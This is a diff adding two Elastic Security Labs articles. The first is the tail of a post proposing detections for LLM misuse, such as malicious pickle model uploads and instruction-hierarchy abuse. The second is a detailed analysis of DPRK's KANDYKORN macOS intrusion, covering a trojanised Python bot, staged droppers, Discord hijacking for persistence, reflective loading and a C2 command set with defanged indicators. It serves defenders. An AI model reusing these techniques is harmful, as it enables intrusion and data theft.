+Latency-based metrics can be a key indicator of underlying performance issues or security threats that overload the system. By monitoring processing delays, organizations can ensure that servers are operating as efficiently as expected.
+
+**Sample Detection**:
+
+```
+from logs-aws_bedrock.invocation-*
+ | WHERE @timestamp > NOW() - 1 DAY
+ | EVAL response_delay_seconds = gen_ai.performance.start_response_time / 1000
+ | WHERE response_delay_seconds > 5
+ | STATS max_response_delay = max(response_delay_seconds),
+         request_count = count() BY gen_ai.user.id
+ | WHERE request_count > 3
+ | SORT max_response_delay DESC
+```
+
+**Detection Description**: This updated query monitors the time it takes for an LLM to start sending a response after receiving a request, focusing on the initial response latency. It identifies significant delays by comparing the actual start of the response to typical response times, highlighting instances where these delays may be abnormally long.
+
+**Security Relevance**: Anomalous latencies can be symptomatic of issues such as network attacks (e.g., DDoS) or system inefficiencies that need to be addressed. By tracking and analyzing latency metrics, organizations can ensure that their systems are running efficiently and securely, and can quickly respond to potential threats that might manifest as abnormal delays.
+
+## Advanced LLM detection engineering use cases
+
+This section explores potential use cases that could be addressed with an Elastic Security integration. It assumes that these fields are fully populated and that necessary security auditing enrichment features (e.g., Guardrails) have been implemented, either within AWS Bedrock or via a similar approach provided by the LLM vendor. In combination with the available data source and Elastic integration, detection rules can be built on top of these Guardrail requests and responses to detect misuse of LLMs in deployment.
+
+### Malicious model uploads and cross-tenant escalation
+
+A recent investigation into the Hugging Face Interface API revealed a significant risk where attackers could upload a maliciously crafted model to perform arbitrary code execution. This was achieved by using a Python Pickle file that, when deserialized, executed embedded malicious code. These vulnerabilities highlight the need for rigorous security measures to inspect and sanitize all inputs in AI-as-a-Service (AIAAS) platforms from the LLM, to the infrastructure that hosts the model, and the application API integration. Refer to [this article](https://www.wiz.io/blog/wiz-and-hugging-face-address-risks-to-ai-infrastructure) for more details.
+
+**Potential Detection Opportunity**: Use fields like ```gen_ai.request.model.id```, ```gen_ai.request.model.version```, and prompt ```gen_ai.completion``` to detect interactions with anomalous models. Monitoring unusual values or patterns in the model identifiers and version numbers along with inspecting the requested content (e.g., looking for typical Python Pickle serialization techniques) may indicate suspicious behavior. Similarly, a check prior to uploading the model using similar fields may block the upload. Cross-referencing additional fields like ```gen_ai.user.id``` can help identify malicious cross-tenant operations performing these types of activities.
+
+### Unauthorized URLs and external communication
+
+As LLMs become more integrated into operational ecosystems, their ability to interact with external capabilities like email or webhooks can be exploited by attackers. To protect against these interactions, it’s important to implement detection rules that can identify suspicious or unauthorized activities based on the model’s outputs and subsequent integrations.
+
+**Potential Detection Opportunity**: Use fields like ```gen_ai.completion```, and ```gen_ai.security.regex_pattern_count``` to triage malicious external URLs and webhooks. These regex patterns need to be predefined based on well-known suspicious patterns.
+
+#### Hierarchical instruction prioritization
+
+LLMs are increasingly used in environments where they receive instructions from various sources (e.g., [ChatGPT Custom Instructions](https://openai.com/blog/custom-instructions-for-chatgpt)), which may not always have benign intentions. This build-your-own model workflow can lead to a range of potential security vulnerabilities, if the model treats all instructions with equal importance, and they go unchecked. Reference [here](https://arxiv.org/pdf/2404.13208.pdf). 
+
+**Potential Detection Opportunity**: Monitor fields like ```gen_ai.model.instructions``` and ```gen_ai.completion``` to identify discrepancies between given instructions and the models responses which may indicate cases where models treat all instructions with equal importance. Additionally, analyze the ```gen_ai.similarity_score```, to discern how similar the response is from the original request.
+
+### Extended detections featuring additional Elastic rule types
+
+This section introduces additional detection engineering techniques using some of Elastic’s rule types, Threshold, Indicator Match, and New Terms to provide a more nuanced and robust security posture. 
+
+ - **Threshold Rules**: Identify high frequency of denied requests over a short period of time grouped by ```gen_ai.user.id``` that could be indicative of abuse attempts. (e.g. OWASP’s LLM04) 
+ - **Indicator Match Rules**: Match known malicious threat intel provided indicators such as the LLM user ID like the ```gen_ai.user.id``` which contain these user attributes. (e.g. ``arn:aws:iam::12345678912:user/thethreatactor``) 
+ - **New Terms Rules**: Detect new or unusual terms in user prompts that could indicate usual activity outside of the normal usage for the user’s role, potentially indicating new malicious behaviors.
+
+## Summary
+
+Elastic is pioneering the standardization of LLM-based fields across the generative AI landscape to enable security detections across the ecosystem. This initiative not only aligns with our ongoing enhancements in LLM integration and security strategies but also supports our broad security framework that safeguards both direct user interactions and the underlying system architectures. By promoting a uniform language among LLM vendors for enhanced detection and response capabilities, we aim to protect the entire ecosystem, making it more secure and dependable. Elastic invites all stakeholders within the industry, creators, maintainers, integrators and users, to adopt these standardized practices, thereby strengthening collective security measures and advancing industry-wide protections.
+
+As we continue to add and enhance our integrations, starting with AWS Bedrock, we are strategizing to align other LLM-based integrations to the new standards we’ve set, paving the way for a unified experience across the Elastic ecosystem. The seamless overlap with existing Elasticsearch capabilities empowers users to leverage sophisticated search and analytics directly on the LLM data, driving existing workflows back to tools users are most comfortable with. 
+
+Check out the [LLM Safety Assessment](https://www.elastic.co/security/llm-safety-report), which delves deeper into these topics.
+
+__The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.__
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_catches_dprk_passing_out_kandykorn.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_catches_dprk_passing_out_kandykorn.md
new file mode 100644
index 0000000000000..89d92a3c203d6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_catches_dprk_passing_out_kandykorn.md
@@ -0,0 +1,671 @@
+---
+title: "Elastic catches DPRK passing out KANDYKORN"
+slug: "elastic-catches-dprk-passing-out-kandykorn"
+date: "2023-11-01"
+description: "Elastic Security Labs exposes an attempt by the DPRK to infect blockchain engineers with novel macOS malware."
+author:
+  - slug: colson-wilhoit
+  - slug: ricardo-ungureanu
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "photo-edited-01@2x.jpg"
+category:
+  - slug: malware-analysis
+  - slug: attack-pattern
+  - slug: activity-group
+tags:
+  - ref7001
+  - KANDYKORN
+  - SUGARLOADER
+  - HLOADER
+  - DPRK
+  - Lazarus Group
+  - Crypto
+  - Financial Motivation
+---
+
+## Preamble
+
+Elastic Security Labs is disclosing a novel intrusion targeting blockchain engineers of a crypto exchange platform. The intrusion leveraged a combination of custom and open source capabilities for initial access and post-exploitation.
+
+We discovered this intrusion when analyzing attempts to reflectively load a binary into memory on a macOS endpoint. The intrusion was traced to a Python application posing as a cryptocurrency arbitrage bot delivered via a direct message on a public Discord server.
+
+We attribute this activity to DPRK and recognize overlaps with the Lazarus Group based on our analysis of the techniques, network infrastructure, code-signing certificates, and custom Lazarus Group detection rules; we track this intrusion set as REF7001.
+
+### Key takeaways
+* Threat actors lured blockchain engineers with a Python application to gain initial access to the environment
+* This intrusion involved multiple complex stages that each employed deliberate defense evasion techniques
+* The intrusion set was observed on a macOS system where an adversary attempted to load binaries into memory, which is atypical of macOS intrusions
+
+## Execution flow
+![_REF7001 Execution Flow_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image31.jpg)
+
+
+Attackers impersonated blockchain engineering community members on a public Discord frequented by members of this community. The attacker social-engineered their initial victim, convincing them to download and decompress a ZIP archive containing malicious code. The victim believed they were installing an [arbitrage bot](https://wundertrading.com/en/crypto-arbitrage-bot), a software tool capable of profiting from cryptocurrency rate differences between platforms.
+
+This execution kicked off the primary malware execution flow of the REF7001 intrusion, culminating in KANDYKORN:
+* Stage 0 (Initial Compromise) - `Watcher.py`
+* Stage 1 (Dropper) - `testSpeed.py` and `FinderTools`
+* Stage 2 (Payload) - `.sld` and `.log` - SUGARLOADER
+* Stage 3 (Loader)- Discord (fake) - HLOADER
+* Stage 4 (Payload) - KANDYKORN
+
+## Stage 0 Initial compromise: Watcher.py
+
+The initial breach was orchestrated via a camouflaged Python application designed and advertised as an arbitrage bot targeted at blockchain engineers. This application was distributed as a .zip file titled `Cross-Platform Bridges.zip`. Decompressing it reveals a `Main.py` script accompanied by a folder named `order_book_recorder`, housing 13 Python scripts.
+
+![_Cross-Platform Bridges.zip folder structure_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image21.png)
+
+
+The victim manually ran the `Main.py` script via their PyCharm IDE Python interpreter.
+
+Initially, the `Main.py` script appears benign. It imports the accompanying Python scripts as modules and seems to execute some mundane functions. 
+
+While analyzing the modules housed in the `order_book_recorder` folder, one file -- `Watcher.py` -- clearly stood out and we will see why.
+
+`Main.py` acts as the initial trigger, importing `Watcher.py` as a module that indirectly executes the script. The Python interpreter runs every top-level statement in `Watcher.py` sequentially.
+
+The script starts off by establishing local directory paths and subsequently attempts to generate a `_log` folder at the specified location. If the folder already exists, the script remains passive.
+
+![*Creating a folder within the Python application directory structure and name it _log*](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image17.png)
+
+
+The script pre-defines a `testSpeed.py` file path (destined for the just created `_log` folder) and assigns it to the `output` variable. The function `import_networklib` is then defined. Within it, a Google Drive URL is initialized. 
+
+Utilizing the Python `urllib` library, the script fetches content from this URL and stashes it in the `s_args` variable. In case of retrieval errors, it defaults to returning the operating system's name. Subsequently, the content from Google Drive (now in `s_args`) is written into the `testSpeed.py` file.
+
+![_Malicious downloader function import_networklib_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image25.png)
+
+
+![_Connect to Google Drive url and download data saved to a variable s_args_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image24.png)
+
+
+![*Write data from s_args to testSpeed.py file in newly created _log directory*](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image1.png)
+
+
+The next function, `get_modules_base_version`, probes the Python version and invokes the `import_networklib` function if it detects version 3. This call sets the entire sequence in motion.
+
+![_Check if Python version 3, calls the import_networklib function_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image14.png)
+
+
+`Watcher.py` imports `testSpeed.py` as a module, executing the contents of the script.
+
+![_Import testSpeed.py to execute it_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image7.png)
+
+
+Concluding its operation, the malicious script tidies up, deleting the `testSpeed.py` file immediately after its one-time execution.
+
+![_Delete the downloaded testSpeed.py file following its import and execution_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image8.png)
+
+
+![_Watcher.py deletes the testSpeed.py immediately following its execution_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image35.png)
+
+
+## Stage 1 droppers testSpeed.py and FinderTools
+
+When executed, `testSpeed.py` establishes an outbound network connection and fetches another Python file from a Google Drive URL, named `FinderTools`. This new file is saved to the `/Users/Shared/` directory, with the method of retrieval mirroring the `Watcher.py` script.
+
+![_testSpeed.py network connection_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image9.png)
+
+
+![_FinderTools file creation _](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image2.png)
+
+
+After download, `testSpeed.py` launches `FinderTools`, providing a URL (`tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC`) as an argument which initiates an outbound network connection. 
+
+![_FinderTools execution_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image3.png)
+
+
+![_FinderTools network connections_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image13.png)
+
+
+`FinderTools` is yet another dropper, downloading and executing a hidden second stage payload `.sld` also written to the `/Users/Shared/` directory.
+
+![_FinderTools executes .sld_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image5.png)
+
+
+## Stage 2 payload .sld and .log: SUGARLOADER
+
+Stage 2 involves the execution of an obfuscated binary we have named SUGARLOADER, which is utilized twice under two separate names (`.sld` and `.log`).
+
+SUGARLOADER is first observed at `/Users/shared/.sld`. The second instance of SUGARLOADER, renamed to `.log`, is used in the persistence mechanism REF7001 implements with Discord. 
+
+### Obfuscation
+
+SUGARLOADER is used for initial access on the machine, and initializing the environment for the final stage. This binary is obfuscated using a binary packer, limiting what can be seen with static analysis.
+
+The start function of this binary consists of a jump (`JMP`) to an undefined address. This is common for binary packers.
+
+```
+HEADER:00000001000042D6 start:
+HEADER:00000001000042D6                 jmp     0x10000681E
+```
+
+Executing the macOS file object tool `otool -l ./log` lists all the sections that will be loaded at runtime.
+
+```
+Section
+  sectname __mod_init_func
+   segname lko2
+      addr 0x00000001006983f0
+      size 0x0000000000000008
+    offset 4572144
+     align 2^3 (8)
+    reloff 0
+    nreloc 0
+     flags 0x00000009
+ reserved1 0
+ reserved2 0
+```
+
+`__mod_init_func` contains initialization functions. The C++ compiler places static constructors here. This is the code used to unpack the binary in memory.
+
+A successful method of reverse engineering such files is to place a breakpoint right after the execution of initialization functions and then take a snapshot of the process's virtual memory. When the breakpoint is hit, the code will already be decrypted in memory and can be analyzed using traditional methods.
+
+Adversaries commonly use obfuscation techniques such as this to bypass traditional static signature-based antimalware capabilities. As of this publication, VirusTotal [shows 0 detections of this file](https://www.virustotal.com/gui/file/3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940), which suggests these defense evasions continue to be cost-effective.
+
+![_SUGARLOADER VirusTotal Detections_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image11.png)
+
+
+### Execution
+
+The primary purpose of SUGARLOADER is to connect to a Command and Control server (C2), in order to download a final stage payload we refer to as KANDYKORN, and execute it directly in memory. 
+
+SUGARLOADER checks for the existence of a configuration file at `/Library/Caches/com.apple.safari.ck`. If the configuration file is missing, it will be downloaded and created via a default C2 address provided as a command line argument to the `.sld` binary. In our sample, the C2 address was `23.254.226[.]90` over TCP port `443`. We provide additional information about the C2 in the Network Infrastructure section below.
+
+![_SUGARLOADER C2 established and configuration file download_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image4.png)
+
+
+![_SUGARLOADER writing configuration file_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image40.png)
+
+
+The configuration file is encrypted using RC4 and the encryption key (in the Observations section) is hardcoded within SUGARLOADER itself. The `com.apple.safari.ck` file is utilized by both SUGARLOADER and KANDYKORN for establishing secure network communications.
+```
+struct MalwareConfig
+{
+  char computerId[8];
+  _BYTE gap0[12];
+  Url c2_urls[2];
+  Hostname c2_ip_address[2];
+  _BYTE proxy[200];
+  int sleepInterval;
+};
+```
+
+`computerId` is a randomly generated string identifying the victim’s computer.
+
+A C2 server can either be identified with a fully qualified URL (`c2_urls`) or with an IP address and port (`c2_ip_ddress`). It supports two C2 servers, one as the main server, and the second one as a fallback. The specification or hardcoding of multiple servers like this is commonly used by malicious actors to ensure their connection with the victim is persistent should the original C2 be taken down or blocked. `sleepInterval` is the default sleeping interval for the malware between separate actions.
+
+Once the configuration file is read into memory and decrypted, the next step is to initialize a connection to the remote server. All the communication between the victim’s computer and the C2 server is detailed in the Network Protocol section.
+
+The last step taken by SUGARLOADER is to download a final stage payload from the C2 server and execute it. REF7001 takes advantage of a technique known as [reflective binary loading](https://attack.mitre.org/techniques/T1620/) (allocation followed by the execution of payloads directly within the memory of the process) to execute the final stage, leveraging APIs such as `NSCreateObjectFileImageFromMemory` or `NSLinkModule`. Reflective loading is a powerful technique. If you'd like to learn more about how it works, check out this research by [slyd0g](https://slyd0g.medium.com/understanding-and-defending-against-reflective-code-loading-on-macos-e2e83211e48f) and [hackd](https://hackd.net/posts/macos-reflective-code-loading-analysis/).
+
+This technique can be utilized to execute a payload from an in-memory buffer. Fileless execution such as this [has been observed previously](https://objective-see.org/blog/blog_0x51.html) in attacks conducted by the Lazarus Group.
+
+SUGARLOADER reflectively loads a binary (KANDYKORN) and then creates a new file initially named `appname` which we refer to as `HLOADER` which we took directly from the process code signature’s signing identifier.
+
+![_SUGARLOADER reflective binary load alert_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image12.png)
+
+
+![_SUGARLOADER creates HLOADER_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image36.png)
+
+
+![_HLOADER code signature identifier_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image10.png)
+
+
+![_Pseudocode for SUGARLOADER (stage2)_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image34.png)
+
+
+## Stage 3 loader Discord: HLOADER
+
+HLOADER (`2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1`) is a payload that attempts to masquerade as the legitimate Discord application. As of this writing, [it has 0 detections on VirusTotal](https://www.virustotal.com/gui/file/2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1).
+
+![_HLOADER VirusTotal Detections_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image15.png)
+
+
+HLOADER was identified through the use of a macOS binary code-signing technique that has been [previously linked](https://objective-see.org/blog/blog_0x73.html) to the [DPRK’s Lazarus Group 3CX intrusion](https://www.eset.com/int/about/newsroom/press-releases/research/eset-research-discovers-new-lazarus-dreamjob-campaign-and-links-it-to-phone-provider-3cx-supply-chai/). In addition to other published research, Elastic Security Labs has also used the presence of this technique as an indicator of DPRK campaigns, as seen in our June 2023 research publication on [JOKERSPY](https://www.elastic.co/security-labs/inital-research-of-jokerspy#the-xcc-binary).
+
+### Persistence
+
+We observed the threat actor adopting a technique we have not previously seen them use to achieve persistence on macOS, known as [execution flow hijacking](https://attack.mitre.org/techniques/T1574/). The target of this attack was the widely used application Discord. The Discord application is often configured by users as a login item and launched when the system boots, making it an attractive target for takeover. HLOADER is a self-signed binary written in Swift. The purpose of this loader is to execute both the legitimate Discord bundle and `.log` payload, the latter of which is used to execute Mach-O binary files from memory without writing them to disk.
+
+The legitimate binary `/Applications/Discord.app/Contents/MacOS/Discord` was renamed to `.lock`, and replaced by `HLOADER`. 
+
+![_Discord replaced by HLOADER_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image18.png)
+
+
+Below is the code signature information for `HLOADER`, which has a self-signed identifier structure consistent with other Lazarus Group samples.
+```
+Executable=Applications/Discord.app/Contents/MacOS/Discord
+Identifier=HLOADER-5555494485b460f1e2343dffaef9b94d01136320
+Format=bundle with Mach-O universal (x86_64 arm64)
+CodeDirectory flags=0x2(adhoc) hashes=12+7 location=embedded
+```
+
+When executed, `HLOADER` performs the following operations:
+* Renames itself from `Discord` to `MacOS.tmp`
+* Renames the legitimate Discord binary from `.lock` to `Discord`
+* Executes both Discord and `.log` using `NSTask.launchAndReturnError`
+* Renames both files back to their initial names
+
+![_HLOADER execution event chain_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image37.png)
+
+
+![_HLOADER Discord Application Hijack_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image33.png)
+
+
+The following process tree also visually depicts how persistence is obtained. The root node `Discord` is actually HLOADER disguised as the legitimate app. As presented above, it first runs .lock, which is in fact Discord, and, alongside, spawns SUGARLOADER as a process named .log.
+
+![_Process Tree Analyzer_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image23.png)
+
+
+As seen in stage 2, SUGARLOADER reads the configuration file, connects to the C2 server, and waits for a payload to be received. Another alert is generated when the new payload (KANDYKORN) is loaded into memory. 
+
+![_Reflective Dylib Load Alert for KANDYKORN_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image27.png)
+
+
+## Stage 4 Payload: KANDYKORN
+
+KANDYKORN is the final stage of this execution chain and possesses a full-featured set of capabilities to access and exfiltrate data from the victim’s computer. Elastic Security Labs was able to retrieve this payload from one C2 server which hadn’t been deactivated yet.
+
+### Execution
+
+KANDYCORN processes are forked and run in the background as daemons before loading their configuration file from `/Library/Caches/com.apple.safari.ck`. The configuration file is read into memory then decrypted using the same RC4 key, and parsed for C2 settings. The communication protocol is similar to prior stages using the victim ID value for authentication.
+
+### Command and control
+
+Once communication is established, KANDYKORN awaits commands from the server. This is an interesting characteristic in that the malware waits for commands instead of polling for commands. This would reduce the number of endpoint and network artifacts generated and provide a way to limit potential discovery.
+
+Each command is represented by an integer being transmitted, followed by the data that is specific to each action. Below is a list of the available commands KANDYKORN provides.
+
+#### Command 0xD1
+
+Action: Exit command where the program gracefully exists.
+
+#### Command 0xD2
+
+Name: `resp_basicinfo`
+Action: Gathers information about the system such as hostname, uid, osinfo, and image path of the current process, and reports back to the server.
+
+![_resp_basicinfo routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image16.png)
+
+
+#### Command 0xD3
+
+Name: `resp_file_dir`
+Action: Lists content of a directory and format the output similar to `ls -al`, including type, name, permissions, size, acl, path, and access time.
+
+![_resp_file_dir routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image20.png)
+
+
+#### Command 0xD4
+
+Name: `resp_file_prop`
+
+Action: Recursively read a directory and count the number of files, number of subdirectories, and total size.
+
+![_resp_file_prop routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image26.png)
+
+
+#### Command 0xD5
+
+Name: `resp_file_upload`
+
+Action: Used by the adversary to upload a file from their C2 server to the victim’s computer. This command specifies a path, creates it, and then proceeds to download the file content and write it to the victim’s computer.
+
+#### Command 0xD6
+
+Name: `resp_file_down`
+
+Action: Used by the adversary to transfer a file from the victim’s computer to their infrastructure.
+
+#### Command 0xD7
+
+Name: `resp_file_zipdown`
+
+Action: Archive a directory and exfiltrate it to the C2 server. The newly created archive’s name has the following pattern`/tmp/tempXXXXXXX`.
+
+![_resp_file_zipdown routine _](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image29.png)
+
+
+#### Command 0xD8
+
+Name: `resp_file_wipe`
+Action: Overwrites file content to zero and deletes the file. This is a common technique used to impede recovering the file through digital forensics on the filesystem.
+
+![_resp_file_wipe routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image28.png)
+
+
+#### Command 0xD9
+
+Name: `resp_proc_list`
+
+Action: Lists all running processes on the system along with their PID, UID and other information.
+
+#### Command 0xDA
+
+Name: `resp_proc_kill`
+
+Action: Kills a process by specified PID.
+
+![_resp_proc_kill routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image19.png)
+
+
+#### Command 0xDB
+
+Name: `resp_cmd_send`
+
+Action: Executes a command on the system by using a pseudoterminal.
+
+#### Command 0xDC
+
+Name: `resp_cmd_recv`
+
+Action: Reads the command output from the previous command `resp_cmd_send`.
+
+#### Command 0xDD
+
+Name: `resp_cmd_create`
+
+Action: Spawns a shell on the system and communicates with it via a pseudoterminal. Once the shell process is executed, commands are read and written through the `/dev/pts` device.
+
+![_resp_cmd_create routine (interactive shell)_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image38.png)
+
+
+#### Command 0xDE
+
+Name: `resp_cfg_get`
+
+Action: Sends the current configuration to the C2 from `/Library/Caches/com.apple.safari.ck`.
+
+#### Command 0xDF
+
+Name: `resp_cfg_set`
+
+Action: Download a new configuration file to the victim’s machine. This is used by the adversary to update the C2 hostname that should be used to retrieve commands from.
+
+#### Command 0xE0
+
+Name: `resp_sleep`
+
+Action: Sleeps for a number of seconds.
+
+### Summary
+
+KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections.
+
+## Network protocol
+
+All the executables that communicate with the C2 (both stage 3 and stage 4) are using the same protocol. All the data is encrypted with RC4 and uses the same key previously referenced in the configuration file.
+
+Both samples implement wrappers around the send-and-receive system calls. It can be observed in the following pseudocode that during the send routine, the buffer is first encrypted and then sent to the socket, whereas when data is received it is first decrypted and then processed.
+
+![_send routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image22.png)
+
+
+![_recv routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image32.png)
+
+
+When the malware first connects to the C2 during the initialization phase, there is a handshake that needs to be validated in order to proceed. Should the handshake fail, the attack would stop and no other commands would be processed.
+
+On the client side, a random number is generated and sent to the C2, which replies with a nonce variable. The client then computes a challenge with the random number and the received nonce and sends the result back to the server. If the challenge is successful and the server accepts the connection, it replies with a constant such as `0x41C3372` which appears in the analyzed sample.
+
+![_Handshake routine_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image39.png)
+
+
+Once the connection is established, the client sends its ID and awaits commands from the server. Any subsequent data sent or received from here is serialized following a common schema used to serialize binary objects. First, the length of the content is sent, then the payload, followed by a return code which indicates if any error occurred.
+
+![_Overview of communication protocol_](/assets/images/elastic-catches-dprk-passing-out-kandykorn/image6.png)
+
+
+## Network infrastructure
+
+During REF7001, the adversary was observed communicating with network infrastructure to collect various payloads and loaders for different stages of the intrusion.
+
+As detailed in the Stage 1 section above, the link to the initial malware archive, `Cross-Platform Bridges.zip`, was provided in a direct message on a popular blockchain Discord server. This archive was hosted on a Google Drive (`https://drive.google[.]com/file/d1KW5nQ8MZccug6Mp4QtKyWLT3HIZzHNIL2`), but this was removed shortly after the archive was downloaded.
+
+Throughout the analysis of the REF7001 intrusion, there were two C2 servers observed.
+* `tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC`
+* `23.254.226[.]90`
+
+### tp-globa[.]xyz
+
+The C2 domain `tp-globa[.]xyz` is used by `FinderTools` to download SUGARLOADER and is likely an attempt at [typosquatting](https://en.wikipedia.org/wiki/Typosquatting) a legitimate foreign exchange market broker. We do not have any information to indicate that the legitimate company is involved in this intrusion. This typosquatted domain was likely chosen in an attempt to appear more legitimate to the victims of the intrusion.
+
+`tp-globa[.]xyz`, as of this writing, resolves to an IP address (`192.119.64[.]43`) that has been observed distributing malware attributed to the DPRK’s Lazarus Group ([1](https://twitter.com/TLP_R3D/status/1677617586349981696), [2](https://twitter.com/_reboot_xxxx/status/1679054436289880065), [3](https://twitter.com/KSeznec/status/1678319191110082560)).
+
+### 23.254.226[.]90
+
+23.254.226[.]90 is the C2 IP used for the `.sld` file (SUGARLOADER malware). How this IP is used for C2 is highlighted in the stage 2 section above. 
+
+On October 14, 2023, `23.254.226[.]90` was used to register the subdomain, `pesnam.publicvm[.]com`. While we did not observe this domain in our intrusion, it is [documented](https://www.virustotal.com/gui/domain/publicvm.com/detection) as hosting other malicious software.
+
+## Campaign intersections
+
+`tp-globa[.]xyz`, has a TLS certificate with a Subject CN of `bitscrunnch.linkpc[.]net`. The domain `bitscrunnch.linkpc[.]net` has been [attributed](https://twitter.com/tiresearch1/status/1708141542261809360?s=20) to other Lazarus Group intrusions.
+
+As noted above, this is likely an attempt to typosquat a legitimate domain for a decentralized NFT data platform. We do not have any information to indicate that the legitimate company is involved in this intrusion.
+```
+…
+Issuer: C = US, O = Let's Encrypt, CN = R3
+Validity
+Not Before: Sep 20 12:55:37 2023 GMT
+Not After : Dec 19 12:55:36 2023 GMT
+Subject: CN = bitscrunnch[.]linkpc[.]net
+…
+```
+
+The `bitscrunnch.linkpc[.]net`’s TLS certificate is also used for [other additional domains](https://www.virustotal.com/gui/search/entity%253Adomain%2520ssl_subject%253Abitscrunnch.linkpc.net/domains), all of which are registered to the same IP address reported above in the `tp-globa[.]xyz` section above, `192.119.64[.]43`.
+* `jobintro.linkpc[.]net`
+* `jobdescription.linkpc[.]net`
+* `docsenddata.linkpc[.]net`
+* `docsendinfo.linkpc[.]net`
+* `datasend.linkpc[.]net`
+* `exodus.linkpc[.]net`
+* `bitscrunnch.run[.]place`
+* `coupang-networks[.]pics`
+
+While LinkPC is a legitimate second-level domain and dynamic DNS service provider, it is [well-documented](https://www.virustotal.com/gui/domain/linkpc.net/community) that this specific service is used by threat actors for C2. In our [published research into RUSTBUCKET](https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket), which is also attributed to the DPRK, we observed LinkPC being used for C2.
+
+All registered domains, 48 as of this writing, for `192.119.64[.]43` are included in the observables bundle.
+
+Finally, in late July 2023, there were reports on the Subreddits [r/hacking](https://www.reddit.com/r/hacking/comments/15b4uti/comment/jtprebt/), [r/Malware](https://www.reddit.com/r/Malware/comments/15b595e/looks_like_a_try_to_steel_some_data/), and [r/pihole](https://www.reddit.com/r/pihole/comments/15d11do/malware_project_mimics_pihole/jtzmpqh/) with URLs that matched the structure of `tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC`. The user on Reddit reported that a recruiter contacted them to solve a Python coding challenge as part of a job offer. The code challenge was to analyze Python code purported to be for an internet speed test. This aligns with the REF7001 victim’s reporting on being offered a Python coding challenge and the script name `testSpeed.py` detailed earlier in this research.
+
+The domain reported on Reddit was `group.pro-tokyo[.]top//OcRLY4xsFlN/vMZrXIWONw/6OyCZl89HS/fP7savDX6c/bfC` which follows the same structure as the REF7001 URL (`tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC`):
+
+* Two `//`’s after the TLD
+* 5 subdirectories using an `//11-characters/10-characters/10-characters/` structure
+* The last 2 subdirectories were `/fP7savDX6c/bfC`
+
+While we did not observe GitHub in our intrusion, the Redditors who reported this did observe GitHub profiles being used. They have all been deactivated.
+
+Those accounts were:
+* `https://github[.]com/Prtof`
+* `https://github[.]com/wokurks`
+
+## Summary
+
+The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions. In this intrusion, they targeted blockchain engineers active on a public chat server with a lure designed to speak to their skills and interests, with the underlying promise of financial gain.
+
+The infection required interactivity from the victim that would still be expected had the lure been legitimate. Once executed, via a Python interpreter, the REF7001 execution flow went through 5 stages:
+* Stage 0 (staging) - `Main.py` executes `Watcher.py` as an imported module. This script checks the Python version, prepares the local system directories, then downloads, executes, and cleans up the next stage.
+* Stage 1 (generic droppers) - `testSpeed.py` and `FinderTools` are intermediate dropper Python scripts that download and execute SUGARLOADER.
+* Stage 2 (SUGARLOADER) - `.sld` and `.log` are Mach-O executable payloads that establish C2, write the configuration file and reflectively load KANDYKORN.
+* Stage 3 (HLOADER) - `HLOADER`/`Discord`(fake) is a simple loader used as a persistence mechanism masquerading as the legitimate Discord app for the loading of SUGARLOADER.
